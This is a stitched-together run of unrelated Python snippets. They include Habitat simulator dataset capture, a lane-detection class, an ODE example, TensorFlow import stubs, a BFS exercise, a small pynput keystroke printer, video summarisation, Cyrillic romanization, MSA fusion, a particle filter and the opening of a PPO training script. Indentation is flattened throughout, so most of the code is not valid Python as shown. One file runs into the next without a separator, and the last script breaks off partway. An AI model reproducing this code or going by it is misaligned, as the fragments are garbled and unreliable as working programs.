def prepare_directories(dataset_folder):
folders = {}
folders["rgb_left_folder"] = os.path.join(dataset_folder, "RGB_left")
os.makedirs(folders["rgb_left_folder"], exist_ok=True)
folders["rgb_right_folder"] = os.path.join(dataset_folder, "RGB_right")
os.makedirs(folders["rgb_right_folder"], exist_ok=True)
folders["semantic_folder"] = os.path.join(dataset_folder, "semantic")
os.makedirs(folders["semantic_folder"], exist_ok=True)
folders["depth_folder"] = os.path.join(dataset_folder, "depth")
os.makedirs(folders["depth_folder"], exist_ok=True)
return folders
def cleanup_files(dataset_folder):
files = glob.glob(os.path.join(dataset_folder,'./*/*'))
agent_states_path = os.path.join(dataset_folder, 'agent_states.json')
if os.path.isfile(agent_states_path):
files.append(agent_states_path)
for f in files:
os.remove(f)
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--manual", type=int, default=1, help="True: manual creation, False: automatic creation using actions from file")
parser.add_argument("-a", "--actions_filename", type=str, default='actions.json', help="Filename of the file with actions for automatic dataset creation")
parser.add_argument("-d", "--dataset_folder", type=str, default='data/spring_dataset', help="Path to the folder with dataset")
parser.add_argument("-v", "--video", type=str, default=None, help="If given then video is captured with specified name")
args = parser.parse_args()
return args
# main
if __name__ == "__main__":
args = get_arguments()
config = habitat.get_config(config_paths="configs/tasks/pointnav.yaml")
add_strafe_actions(config)
W = config.SIMULATOR.RGB_SENSOR.WIDTH
H = config.SIMULATOR.RGB_SENSOR.HEIGHT
if args.video:
cap = cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
out = cv2.VideoWriter(os.path.join(args.dataset_folder, args.video), fourcc, 30.0, (W,H))
###############################################
hfov = float(config.SIMULATOR.DEPTH_SENSOR.HFOV) * np.pi / 180.
vfov = 2. * np.arctan(np.tan(hfov / 2) * H / W)
max_depth = config.SIMULATOR.DEPTH_SENSOR.MAX_DEPTH
###############################################
actions = []
agent_states = {}
if not args.manual:
with open(os.path.join(args.dataset_folder, args.actions_filename)) as f:
actions = json.load(f)['sequence']
folders = prepare_directories(args.dataset_folder)
cleanup_files(args.dataset_folder)
objects = []
# objects = [["trex", [-2.64, 0.70, 1.59]],
# ["bird", [-2.64, 0.2, 2.59]],
# ["bucket", [-3.64, 0.2, 1.59]],
# ["plane", [-3.64, 0.2, 2.59]],
# ["banana", [7.31 , 0.05, -0.28]]]
# initialize env
env = envs.spring_env.SpringEnv(
config=config, objects=objects
)
print("Environment creation successful")
observations = env.reset()
show_observations(observations)
print("Agent stepping around inside environment.")
count_steps = 0
agent_states[count_steps] = {"position": observations["agent_state"].position.tolist(),
"rotation": np.asarray(observations["agent_state"].rotation,
dtype=np.quaternion).view((np.double, 4)).tolist()}
while not env.episode_over:
action = None
if args.manual:
keystroke = cv2.waitKey(0)
action = get_action(keystroke)
if action is None:
continue
actions.append(action)
else:
action = actions[count_steps]
observations = env.step(action)
count_steps += 1
show_observations(observations)
agent_states[count_steps] = {"position": observations["agent_state"].position.tolist(),
"rotation": np.asarray(observations["agent_state"].rotation,
dtype=np.quaternion).view((np.double, 4)).tolist()}
rgb_left_image = cv2.cvtColor(observations['rgb'], cv2.COLOR_RGB2BGR)
            rgb_right_image = cv2.cvtColor(observations['rgb1'], cv2.COLOR_RGB2BGR)  # right camera image is 'rgb1'
semantic_image = extract_semantic_image(observations)
depth_image = np.stack((observations['depth'], observations['depth'], observations['depth']), axis=2)[:, :, :, 0]
depth_image = (255*depth_image).astype(np.uint8)
if args.video:
out.write(rgb_left_image)
cv2.imwrite(os.path.join(folders["rgb_left_folder"], "{}.jpg".format(count_steps)),
rgb_left_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
cv2.imwrite(os.path.join(folders["rgb_right_folder"], "{}.jpg".format(count_steps)),
rgb_right_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
cv2.imwrite(os.path.join(folders["semantic_folder"], "{}.jpg".format(count_steps)),
semantic_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
cv2.imwrite(os.path.join(folders["depth_folder"], "{}.jpg".format(count_steps)),
depth_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
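        # Back-project the centre pixel to world coordinates: K is a pinhole
        # projection matrix built from the horizontal/vertical FOV, C is the
        # world-to-camera transform assembled from the RGB sensor pose, and the
        # measured depth d is unprojected through K^-1 and then C^-1.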
K = np.array([
[1 / np.tan(hfov / 2.), 0., 0., 0.],
[0., 1 / np.tan(vfov / 2.), 0., 0.],
[0., 0., -1, 0], # -1 to swap floor/ceil distances
[0., 0., 0, 1]])
#quaternion = [observations["agent_state"].sensor_states["rgb"].rotation.w] + observations["agent_state"].sensor_states["rgb"].rotation.item().vec.tolist()
R = quaternion.as_rotation_matrix(observations["agent_state"].sensor_states["rgb"].rotation)#Rotation.from_quat(quaternion).as_matrix()
cam_pos = observations["agent_state"].sensor_states["rgb"].position
T = -R.T @ cam_pos
C = np.eye(4)
C[0:3,0:3] = R.T
C[0:3,3] = T.squeeze()
d = depth_image[depth_image.shape[0]//2][depth_image.shape[1]//2][0]/255*max_depth
pixel_coordinate = np.array([0, 0, d, 1]).reshape(4,-1)
xyz = np.linalg.inv(C) @ np.linalg.inv(K) @ pixel_coordinate
env.add_object("objects/banana", xyz[:3].T.squeeze())
# d = depth_image[depth_image.shape[0]//4][depth_image.shape[1]//2][0]/255*max_depth
# pixel_coordinate = np.array([0, 0.5*d, d, 1]).reshape(4,-1)
#
# xyz = np.linalg.inv(C) @ np.linalg.inv(K) @ pixel_coordinate
# env.add_object("objects/banana", xyz[:3].T.squeeze())
print(observations["agent_state"].sensor_states["rgb"].position)
print("XYZ: {}".format(xyz[:3].T.squeeze()))
# end
if args.video:
cap.release()
out.release()
cv2.destroyAllWindows()
with open(os.path.join(args.dataset_folder, "agent_states.json"), 'w', encoding='utf-8') as f:
json.dump(agent_states, f, ensure_ascii=False, indent=4)
if args.manual:
data = {'sequence': actions}
with open(os.path.join(args.dataset_folder, args.actions_filename), 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
print('DATASET WITH LENGTH {} FINISHED'.format(count_steps))
|
import numpy as np
import cv2
def eval_poly(vec, poly):
"""
Evaluates value of a polynomial at a given point
:param vec: The given point :float
:param poly: The polynomial :ndarray[3,]
:return: value of polynomial at given point :float
"""
return vec ** 2 * poly[0] + vec * poly[1] + poly[2]
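# Worked example: eval_poly(2.0, np.array([1.0, 2.0, 3.0])) == 4 + 4 + 3 == 11.0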
def curvature_of_poly(poly, y):
"""
Given a polynomial and a point y calculate its curvature
:param poly: The polynomial :ndarray[3,]
:param y: The point to calculate curvature at :float
:return: The curvature of Polynomial at y
"""
a, b, c = poly
return ((1 + (2 * a * y + b) ** 2) ** (3 / 2)) / np.abs(2 * a)
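# Sanity check (illustrative): for x = 0.5*y**2 (poly = [0.5, 0.0, 0.0]) the
# value at y = 0 is (1 + 0)**1.5 / |2*0.5| == 1.0, i.e. a unit osculating
# circle at the vertex.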
class Lane:
left_anchor = None
right_anchor = None
left_poly = None
left_poly_m = None
right_poly = None
right_poly_m = None
win_count = None
search_window_margin = None
min_votes = None
image_size = None
mean_dist = 0
dist_count = 0
data_min = 0
curvature = 0
vehicle_center = 0
lane_width = 3.7 # average lane width
vehicle_width = 2.5 # average vehicle width
xm_per_pix = lane_width / 580 # 1280 - 350(offset)*2 = 580px
ym_per_pix = 30 / 720 # 30 meters actual lane length in ROI perspective projected on 720px
M_ = None
M_inv_ = None
@classmethod
def threshold(cls, frame):
"""
Combine Saturation and Sobel thresholds to extract possible lane indication pixels
:param frame: The given image to extract lane pixels
:return: Grayscale image with highlighted possible lane pixels
"""
image = cv2.cvtColor(frame, cv2.COLOR_RGB2HLS) # Convert to HLS
s_ = image[:, :, 2] # extract S channel from HLS
_h, _w = s_.shape
image = cv2.GaussianBlur(s_, (5, 5), 1) # Blur before thresholding to reduce noise
highly_saturated = np.uint8(image > 200)
sobel_strong_edges = np.uint8(cv2.Sobel(image, cv2.CV_64F, 1, 0) > 20)
# Highlight where highly saturated or strong sobel edge pixels are found
image = highly_saturated * 50 + sobel_strong_edges * 50
return image
def find_hist_based_anchors(self, frame):
"""
Using histograms find left and right lane polynomial starting points
:param frame: Input frame
:return: None
"""
# define bounds
frame_height = frame.shape[0]
win_height = int(frame_height / self.win_count)
mid_point = int(frame.shape[1] / 2)
# calculate histogram of last 1/8th row patch
hist = np.sum(frame[-win_height:, :] > 0, 0)
# extract max values one from left half of image and one from right half as left and right anchors
# respectively
self.left_anchor = np.argmax(hist[:mid_point])
self.right_anchor = np.argmax(hist[mid_point:]) + mid_point
def extract_poly(self, frame):
"""
Use left and right anchors as starting point and apply sliding window approach to find points of interest
for lane polynomial
:param frame: Input frame
:return: None
"""
debug = np.copy(frame) # for debug draw sliding window rects
# Define current left and right x positions
cur_left = self.left_anchor
cur_right = self.right_anchor
# Search parameters setup
height, width = frame.shape[:2]
win_height = int(height / self.win_count)
margin = self.search_window_margin
# Storage for left and right points of interest for polynomial
nonzero_indices_left = []
nonzero_indices_right = []
# Extract all nonzero x and y locations from frame
nonzero_y, nonzero_x = np.nonzero(frame)
# For all sliding windows
for i in range(self.win_count):
# Define window start and end
win_set = height - (i + 1) * win_height
win_end = height - i * win_height
# Find left and right polynomial candidates by checking if they lie inside the sliding window
left_candidates = (
(nonzero_y >= win_set) &
(nonzero_y < win_end) &
(nonzero_x >= max(cur_left - margin, 0)) &
(nonzero_x < min(cur_left + margin, width))
).nonzero()[0]
right_candidates = (
(nonzero_y >= win_set) &
(nonzero_y < win_end) &
(nonzero_x >= max(cur_right - margin, 0)) &
(nonzero_x < min(cur_right + margin, width))
).nonzero()[0]
# Add found candidates to their respective storages
nonzero_indices_left += left_candidates.tolist()
nonzero_indices_right += right_candidates.tolist()
            # If enough candidates were found, shift the current x position to the mean of the window's points
            if len(left_candidates) > self.min_votes:
                cur_left = np.mean(nonzero_x[left_candidates])
            if len(right_candidates) > self.min_votes:
                cur_right = np.mean(nonzero_x[right_candidates])
# Draw rects for debugging
cv2.rectangle(debug, (int(cur_left - margin), win_set), (int(cur_left + margin), win_end), 255)
cv2.rectangle(debug, (int(cur_right - margin), win_set), (int(cur_right + margin), win_end), 255)
# Extract x and y indices of candidates for both left and right polynomial
left_y = nonzero_y[nonzero_indices_left]
left_x = nonzero_x[nonzero_indices_left]
right_y = nonzero_y[nonzero_indices_right]
right_x = nonzero_x[nonzero_indices_right]
        # If the candidate points for a polynomial exceed a threshold, fit a polynomial to them.
        # Also fit metric polynomials to use for curvature and vehicle position estimation.
        if len(nonzero_indices_left) > 100:
self.left_poly = np.polyfit(left_y, left_x, 2)
            # Find a metric polynomial by converting points to real-world coordinates
left_y_metric = left_y * self.ym_per_pix
left_x_metric = (left_x - self.warp_offset) * self.xm_per_pix # Consider perspective transform offset
self.left_poly_m = np.polyfit(left_y_metric, left_x_metric, 2)
        if len(nonzero_indices_right) > 100:
self.right_poly = np.polyfit(right_y, right_x, 2)
right_y_metric = right_y * self.ym_per_pix
right_x_metric = (right_x - self.warp_offset) * self.xm_per_pix
self.right_poly_m = np.polyfit(right_y_metric, right_x_metric, 2)
# keep track of overall mean pixel distances between left and right polynomials
self.mean_dist += self.right_anchor - self.left_anchor
self.dist_count += 1
# estimate curvature and vehicle position using found lane polynomials
self.estimate_curvature_and_position()
def estimate_curvature_and_position(self):
"""
Estimates curvature of lane and position of vehicle
:return: None
"""
height = self.image_size[0]
eval_point = (height - 1) * self.ym_per_pix # point closest to vehicle to estimate curvature at
# Find curvature of both polynomials and take mean
left_curvature = curvature_of_poly(self.left_poly_m, eval_point)
right_curvature = curvature_of_poly(self.right_poly_m, eval_point)
self.curvature = (left_curvature + right_curvature) / 2
# Find vehicle position
absolute_vehicle_center = (eval_poly(eval_point, self.right_poly_m) +
eval_poly(eval_point, self.left_poly_m)) / 2
# Estimate vehicle position relative to lane center
self.vehicle_center = self.lane_width / 2 - absolute_vehicle_center
def create_image_mask(self):
"""
Create image mask based on lane polynomials to highlight frame
:return: Mask image
"""
h, w = self.image_size
im = np.zeros((h, w, 3), dtype=np.uint8)
# Sample y points starting from top confidence location to bottom of image
plot_y = np.linspace(self.data_min, h - 1, h - self.data_min)
# Calculate values of polynomials at y sample points
left_plt_x = self.left_poly[0] * plot_y ** 2 + self.left_poly[1] * plot_y + self.left_poly[2]
right_plt_x = self.right_poly[0] * plot_y ** 2 + self.right_poly[1] * plot_y + self.right_poly[2]
# Update mean dist using intercepts of polynomials
self.mean_dist += right_plt_x[-1] - left_plt_x[-1]
self.dist_count += 1
# For each sampled y
for i in range(h - self.data_min):
# Find start and end lane pixel
start = int(max(0, left_plt_x[i]))
end = int(min(w, right_plt_x[i]))
# Color lane pixels for current row to be green
im[i + self.data_min, start:end, 1] = 255
            # Add red proportional to how far the vehicle is from the lane center
im[i + self.data_min, start:end, 2] = \
abs(self.vehicle_center) / ((self.lane_width - self.vehicle_width) / 2) * 255
return im
def mask_frame(self, frame):
"""
Mask/Highlight given frame with currently estimated lane area
:param frame: Current frame
:return: Masked frame
"""
        # Get the mask, unwarp the perspective and overlay it on the frame
mask = self.create_image_mask()
lane_mask = self.perspective_unwrap(mask)
frame = cv2.addWeighted(frame, 1, lane_mask, 0.5, 0)
# Check where vehicle is relative to lane center
direction = "left" if self.vehicle_center < 0 else "right"
# Show current curvature and vehicle position on image
cv2.putText(
frame,
f"Curvature: {int(self.curvature)} m",
(10, 35),
cv2.FONT_HERSHEY_SIMPLEX,
1, (255, 255, 255), 2,
cv2.LINE_AA
)
cv2.putText(
frame,
f"{direction}: {int(abs(self.vehicle_center) * 100) / 100} m",
(10, 85),
cv2.FONT_HERSHEY_SIMPLEX,
1, (255, 255, 255), 2,
cv2.LINE_AA
)
return frame
def process(self, frame):
"""
Update polynomials using previously estimated lane polynomials and given frame
:param frame: Current undistorted video frame
        :return: None
"""
        # Perspective warp and threshold the frame
frame = self.preprocess_frame(frame)
# Set search window margin
margin = self.search_window_margin
# Extract nonzero x and y locations from current frame
nonzero_y, nonzero_x = np.nonzero(frame)
# Given polynomials and search window margin check which nonzero pixels are polynomial candidates
nonzero_left = eval_poly(nonzero_y, self.left_poly)
nonzero_right = eval_poly(nonzero_y, self.right_poly)
left_candidates = (
(nonzero_x >= nonzero_left - margin) &
(nonzero_x < nonzero_left + margin)
).nonzero()[0]
right_candidates = (
(nonzero_x >= nonzero_right - margin) &
(nonzero_x < nonzero_right + margin)
).nonzero()[0]
# Extract x and y indices of polynomial candidates for both left and right
left_y = nonzero_y[left_candidates]
left_x = nonzero_x[left_candidates]
right_y = nonzero_y[right_candidates]
right_x = nonzero_x[right_candidates]
        # Find the confidence point, i.e. the topmost y where we have data for both polynomials;
        # we don't want to highlight lane area where we are not confident
        if left_y.size > 0 and right_y.size > 0:
self.data_min = max(left_y.min(), right_y.min())
# If polynomial candidates are greater than a threshold update polynomials both pixel and metric
        if len(left_candidates) > 50:
self.left_poly *= 0.7
self.left_poly_m *= 0.7
self.left_poly += 0.3 * np.polyfit(left_y, left_x, 2)
self.left_poly_m += 0.3 * \
np.polyfit(left_y * self.ym_per_pix, (left_x - self.warp_offset) * self.xm_per_pix, 2)
        if len(right_candidates) > 50:
self.right_poly *= 0.7
self.right_poly_m *= 0.7
self.right_poly += 0.3 * np.polyfit(right_y, right_x, 2)
self.right_poly_m += 0.3 * \
np.polyfit(
right_y * self.ym_per_pix, (right_x - self.warp_offset) * self.xm_per_pix, 2
)
        # Check if the found polynomials' intercepts are plausible; if not, reinitialize with the sliding window method
if not self.are_intercepts_correct():
self.init(frame)
# Estimate lane curvature and vehicle position
self.estimate_curvature_and_position()
def are_intercepts_correct(self):
"""
        Check if the polynomials are plausible by verifying that their intercepts are at least 200 pixels apart
        :return: True if the intercepts are far enough apart, False otherwise
"""
return self.right_poly[2] - self.left_poly[2] > 200
def __init__(self, frame, roi, warp_offset, win_count=8, search_window_margin=30, min_votes=50):
# Initialize internal parameters
self.win_count = win_count
self.image_size = frame.shape[:2]
self.search_window_margin = search_window_margin
self.min_votes = min_votes
self.roi_source = roi
self.warp_offset = warp_offset
# Estimate perspective transform matrices
self.estimate_perspective_transform()
# Initialize polynomials with sliding window method
preprocessed = self.preprocess_frame(frame)
self.init(preprocessed)
def preprocess_frame(self, frame):
"""
        Perspective warp and threshold the frame to make it ready for processing
        :param frame: Image
        :return: Thresholded bird's-eye-view image
"""
wrap = self.perspective_wrap(frame)
return self.threshold(wrap)
def init(self, frame):
"""
Initialize using sliding window method
:param frame: Image
:return: None
"""
self.find_hist_based_anchors(frame)
self.extract_poly(frame)
def estimate_perspective_transform(self):
"""
Calculate perspective transform matrices
:return: None
"""
h, w = self.image_size
offset = self.warp_offset
# Create destination polygon based on offset and image dimensions
roi_dest = np.float32([[w - offset, 0], [w - offset, h], [offset, h], [offset, 0]])
self.M_ = cv2.getPerspectiveTransform(np.float32(self.roi_source), roi_dest)
self.M_inv_ = cv2.getPerspectiveTransform(roi_dest, np.float32(self.roi_source))
def perspective_wrap(self, frame):
"""
        Perspective transform to obtain a bird's-eye view
        :param frame: Image
        :return: Warped image
"""
h, w = self.image_size
return cv2.warpPerspective(frame, self.M_, (w, h))
def perspective_unwrap(self, frame):
"""
        Inverse perspective transform to map the bird's-eye view back to the original frame
        :param frame: Image
        :return: Unwarped image
"""
h, w = self.image_size
return cv2.warpPerspective(frame, self.M_inv_, (w, h))
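# Minimal usage sketch (added): wiring the Lane tracker into a video loop.
# The video filename and ROI corners below are hypothetical and must be tuned
# per camera; frames are assumed to be undistorted already.
if __name__ == '__main__':
    cap = cv2.VideoCapture('project_video.mp4')  # hypothetical input file
    ok, frame = cap.read()
    if ok:
        h, w = frame.shape[:2]
        # Source ROI corner order must match the destination polygon: TR, BR, BL, TL
        roi = [[w * 0.55, h * 0.63], [w * 0.82, h], [w * 0.18, h], [w * 0.45, h * 0.63]]
        lane = Lane(frame, roi, warp_offset=350)
        while ok:
            lane.process(frame)
            cv2.imshow('lane', lane.mask_frame(frame))
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
            ok, frame = cap.read()
    cap.release()
    cv2.destroyAllWindows()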
|
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# Solve x''(t) + x(t) = 0
# Convert the second-order ODE to a first-order system:
# let y = x and ydot = x', so y' = ydot and ydot' = -y
def func(y_vec, t):
y, ydot = y_vec
dydt = [ydot, -y]
return dydt
y0 = [1, 0.0]
t = np.linspace(0, 10, 101)
sol = odeint(func, y0, t)
plt.plot(t, sol[:, 0], 'b', label='x(t)')
plt.plot(t, sol[:, 1], 'g', label='x_prime(t)')
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
plt.show()
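# Sanity check (added): with x(0) = 1 and x'(0) = 0 the analytic solution is
# x(t) = cos(t), so the numerical solution should match it closely.
assert np.allclose(sol[:, 0], np.cos(t), atol=1e-4)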
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.framework.summary_pb2 import SummaryDescription
from tensorflow.core.util.event_pb2 import Event
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.core.util.event_pb2 import TaggedRunMetadata
from tensorflow.python.ops.summary_ops import tensor_summary
from tensorflow.python.summary.summary import FileWriter
from tensorflow.python.summary.summary import FileWriterCache
from tensorflow.python.summary.summary import audio
from tensorflow.python.summary.summary import get_summary_description
from tensorflow.python.summary.summary import histogram
from tensorflow.python.summary.summary import image
from tensorflow.python.summary.summary import merge
from tensorflow.python.summary.summary import merge_all
from tensorflow.python.summary.summary import scalar
from tensorflow.python.summary.summary import text |
class Tree:
def __init__(self) -> None:
        self.root: Node = None
self.nodes = {}
@classmethod
def build(cls, edges, root_value, m):
tree = Tree()
for key, (i, j) in enumerate(edges):
if key == m:
break
if not tree.nodes.get(i):
tree.nodes[i] = Node(i)
if not tree.nodes.get(j):
tree.nodes[j] = Node(j)
tree.nodes[i].add_child(tree.nodes[j])
tree.nodes[j].add_child(tree.nodes[i])
if i == root_value:
tree.root = tree.nodes[i]
elif j == root_value:
tree.root = tree.nodes[j]
return tree
class Node:
def __init__(self, value):
self.value = value
self.children = []
self.visited = False
def add_child(self, node):
self.children.append(node)
def bfs(n, m, edges, s):
    tree: Tree = Tree.build(edges, s, m)
array = [tree.root, None]
tree.root.visited = True
height = 6
distances = [-1]*(n-1)
while array:
current = array.pop(0)
if not current:
if not array:
break
height += 6
array.append(None)
current = array.pop(0)
for node in current.children:
if not node.visited:
                node.visited = True
if node.value > s:
distances[node.value-2] = height
else:
distances[node.value-1] = height
array.append(node)
return distances
if __name__ == "__main__":
matrix = [[2,3]]
print(bfs(3,1, matrix, 2))
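# Expected output for the demo above (hand-traced): [-1, 6]
# Each tree edge contributes 6 to the distance; node 3 is one edge from the start
# node 2, and node 1 never appears in the edge list, so it stays unreachable (-1).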
|
from pynput import keyboard
def on_press(key):
print("INPUT:", key)
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
|
import os
import cv2
import glob
import numpy as np
import pandas as pd
def create_video_summary(model, frames, video_as_features, time_length):
    # Score every frame, keep those scoring above the median, and stitch them together.
    scores = model.predict(video_as_features)
    scores_median = np.median(scores)
    impt_indices = np.flatnonzero(scores > scores_median)
    impt_frames = [frames[i] for i in impt_indices]
    # The output filename is an assumption; the original call omitted the required title.
    return create_video_from_frames(impt_frames, 'summary.mp4')
def create_video_from_frames(frames, title, fps=24, fourcc=cv2.VideoWriter_fourcc('m', 'p', '4', 'v')):
img_array = []
for filename in frames:
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width, height)
img_array.append(img)
out = cv2.VideoWriter(title, fourcc, fps, size)
for i in range(len(img_array)):
out.write(img_array[i])
out.release()
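# Usage sketch (added): gather frame image paths and build a plain video from them.
# The directory and output name are hypothetical.
# frames = sorted(glob.glob(os.path.join('frames_dir', '*.jpg')))
# create_video_from_frames(frames, 'full_video.mp4', fps=24)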
|
from elizabeth.core.interdata import ROMANIZATION_ALPHABETS
def romanize(func):
"""Cyrillic letter to latin converter. Romanization of the Russian alphabet
is the process of transliterating the Russian language from the Cyrillic script
into the Latin alphabet.
.. note:: At this moment it's work only for Russian (http://bit.ly/2kjTEO4),
but in future we can add support for all slavic languages or for all Cyrillic languages.
:param func: Function.
:return: Latinized text.
"""
alphabet = ROMANIZATION_ALPHABETS['ru']
def romanized(*args, **kwargs):
result = func(*args, **kwargs)
return ''.join([alphabet[i] for i in result if i in alphabet])
return romanized
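# Usage sketch (added): decorate any callable that returns Cyrillic text; characters
# missing from the romanization table are dropped. The sample string is illustrative.
# @romanize
# def greeting():
#     return 'привет'
# greeting()  # -> a latinized string, e.g. 'privet'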
|
import argparse
import sys
import os
import numpy as np
import pandas as pd
import glob
import pdb
parser = argparse.ArgumentParser(description = '''Fuse the MSAs for interacting chains by writing gaps where the other chain should be.''')
parser.add_argument('--a3m1', nargs=1, type= str, default=sys.stdin, help = 'Path to a3m file 1.')
parser.add_argument('--a3m2', nargs=1, type= str, default=sys.stdin, help = 'Path to a3m file 2.')
parser.add_argument('--max_gap_fraction', nargs=1, type=float, default=sys.stdin, help = 'The maximal gap fraction allowed in each sequence (default = 0.9).')
parser.add_argument('--outname', nargs=1, type= str, default=sys.stdin, help = 'Path to file to write to.')
def read_a3m(infile,max_gap_fraction=0.9):
'''Read a3m MSA'''
mapping = {'-': 21, 'A': 1, 'B': 21, 'C': 2, 'D': 3, 'E': 4, 'F': 5,
'G': 6,'H': 7, 'I': 8, 'K': 9, 'L': 10, 'M': 11,'N': 12,
'O': 21, 'P': 13,'Q': 14, 'R': 15, 'S': 16, 'T': 17,
'V': 18, 'W': 19, 'Y': 20,'U': 21, 'Z': 21, 'X': 21, 'J': 21}
parsed = []#Save extracted msa
species = []
seqlen = 0
lc = 0
with open(infile, 'r') as file:
for line in file:
line = line.rstrip()
if line.startswith('>'): #OX=OrganismIdentifier
if 'OX=' in line:
OX= line.split('OX=')[1]
if len(OX)>0:
species.append(int(OX.split(' ')[0]))
else:
species.append(0)
else:
species.append(0)
continue
gap_fraction = line.count('-') / float(len(line))
if gap_fraction <= max_gap_fraction:#Only use the lines with less than 90 % gaps
parsed.append([mapping.get(ch, 22) for ch in line if not ch.islower()])
else:
if len(species)>1:
species = species[:-1] #Remove the previously stored species
continue
#Check that the lengths match
if len(parsed[-1])!=seqlen and lc>=1:
parsed = parsed[:-1]
species = species[:-1]
continue
seqlen = len(parsed[-1])
lc+=1
return np.array(parsed, dtype=np.int8, order='F'), np.array(species)
def write_a3m(fused, outfile):
'''Write a3m MSA'''
backmap = { 1:'A', 2:'C', 3:'D', 4:'E', 5:'F',6:'G' ,7:'H',
8:'I', 9:'K', 10:'L', 11:'M', 12:'N', 13:'P',14:'Q',
15:'R', 16:'S', 17:'T', 18:'V', 19:'W', 20:'Y', 21:'-'} #Here all unusual AAs and gaps are set to the same char (same in the GaussDCA script)
with open(outfile,'w') as file:
for i in range(len(fused)):
file.write('>'+str(i)+'\n')
file.write(''.join([backmap[ch] for ch in fused[i]])+'\n')
return None
#################MAIN####################
#Parse args
args = parser.parse_args()
max_gap_fraction = args.max_gap_fraction[0]
#Data
a3m1, species1 = read_a3m(args.a3m1[0], max_gap_fraction)
a3m2, species2 = read_a3m(args.a3m2[0], max_gap_fraction)
outname = args.outname[0]
#Construct entire a3m matrix
fused = np.zeros((a3m1.shape[0]+a3m2.shape[0], a3m1.shape[1]+a3m2.shape[1]), dtype=np.int8)
fused[:] = 21 #Assign gaps
#Assign a3m1
fused[:a3m1.shape[0],:a3m1.shape[1]]=a3m1
#Assign a3m2
fused[a3m1.shape[0]:,a3m1.shape[1]:]=a3m2
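#The fused matrix is block diagonal (rows = sequences, columns = positions):
#  [ a3m1 | gaps ]
#  [ gaps | a3m2 ]
#so each chain's alignment is padded with gaps where the other chain sits.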
#Write the fused MSA
write_a3m(fused, outname)
|
from Employee import *
e1 = Employee("seasonfif", 27)
e2 = Employee("season", 20)
e1.name = "qqq"
setattr(e1, "sex", "female")
print(getattr(e1, "sex"))
e1.displayEmployee()
print(Employee.empCount)
import matplotlib.pyplot as plt
import numpy as np
import random as r
import math
from sim.plot import plot, print_particle_error
AUTORUN = False
robot_start = 7
num_particles = 20
distance = 40
poles = [10, 15, 17, 19, 30, 39]
### START STUDENT CODE
class Robot:
def __init__(self, pos):
self.pos = pos
self.move_dist = 1
self.pole_dist = -100
self.max_measurement = 3
# Movement is perfectly accurate, even though we are assuming it isn't.
def move(self):
self.pos += self.move_dist
# Measurement is perfectly accurate even though we are assuming it isn't.
def measure(self, poles):
closest = min([pole - self.pos if (pole - self.pos >= 0) else (self.max_measurement + 1) for pole in poles])
self.pole_dist = closest if closest <= self.max_measurement else -100
class Particle(Robot):
def __init__(self, pos):
Robot.__init__(self, pos)
self.weight = 0
self.measurement_sigma = 0.3
def predict(self):
self.pos = np.random.normal(self.pos + self.move_dist, self.measurement_sigma)
def probability_density_function(self, mu, x):
weight = np.exp((-1/2)*((x - mu)/self.measurement_sigma)**2)/(self.measurement_sigma * np.sqrt(2 * np.pi))
return weight
def update_weight(self, robot_dist):
self.weight = self.probability_density_function(robot_dist, self.pole_dist)
def resample_particles(particles):
    # If the total weight is too low, resample uniformly across the whole track instead.
weights = [part.weight for part in particles]
weight_sum = sum(weights)
if weight_sum < 0.05:
resampled_particles = [Particle(r.uniform(0, distance)) for i in range(num_particles)]
else:
resample = r.choices(population=range(num_particles), weights=weights, k=num_particles)
resampled_particles = [Particle(particles[i].pos) for i in resample]
return resampled_particles
### END STUDENT CODE
robot = Robot(robot_start)
# Setup particles.
particles = [Particle(r.uniform(0, distance - 1 )) for i in range(num_particles)]
# Plot starting distribution, no beliefs
plot(particles, poles, robot.pos)
# Begin Calculating
for j in range(39 - robot.pos):
# Move
if j != 0:
robot.move()
for particle in particles:
particle.predict()
# Measure
robot.measure(poles)
for particle in particles:
particle.measure(poles)
# Update Beliefs
particle.update_weight(robot.pole_dist)
print_particle_error(robot, particles)
# Resample
resampled_particles = resample_particles(particles)
plot(particles, poles, robot.pos, resampled_particles, j, AUTORUN)
particles = resampled_particles
plot(particles, poles, robot.pos, resampled_particles)
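# Sanity note (added): update_weight() evaluates a Gaussian PDF with sigma = 0.3,
# so a particle whose pole measurement exactly matches the robot's gets the peak
# weight 1 / (0.3 * sqrt(2 * pi)) ~= 1.33, and the weight decays with mismatch.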
|
# coding=utf-8
# Copyright 2020 The Real-World RL Suite Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Trains an OpenAI Baselines PPO agent on realworldrl.
Note that OpenAI Gym is not installed with realworldrl by default.
See also github.com/openai/baselines for more information.
This example also relies on dm2gym for its gym environment wrapper.
See github.com/zuoxingdong/dm2gym for more information.
"""
import os
from absl import app
from absl import flags
from baselines import bench
from baselines.common.vec_env import dummy_vec_env
from baselines.ppo2 import ppo2
import dm2gym.envs.dm_suite_env as dm2gym
import realworldrl_suite.environments as rwrl
flags.DEFINE_string('domain_name', 'cartpole', 'domain to solve')
flags.DEFINE_string('task_name', 'realworld_balance', 'task to solve')
flags.DEFINE_string('save_path', '/tmp/rwrl', 'where to save results')
flags.DEFINE_boolean('verbose', True, 'whether to log to std output')
flags.DEFINE_string('network', 'mlp', 'name of network architecture')
flags.DEFINE_float('agent_discount', .99, 'discounting on the agent side')
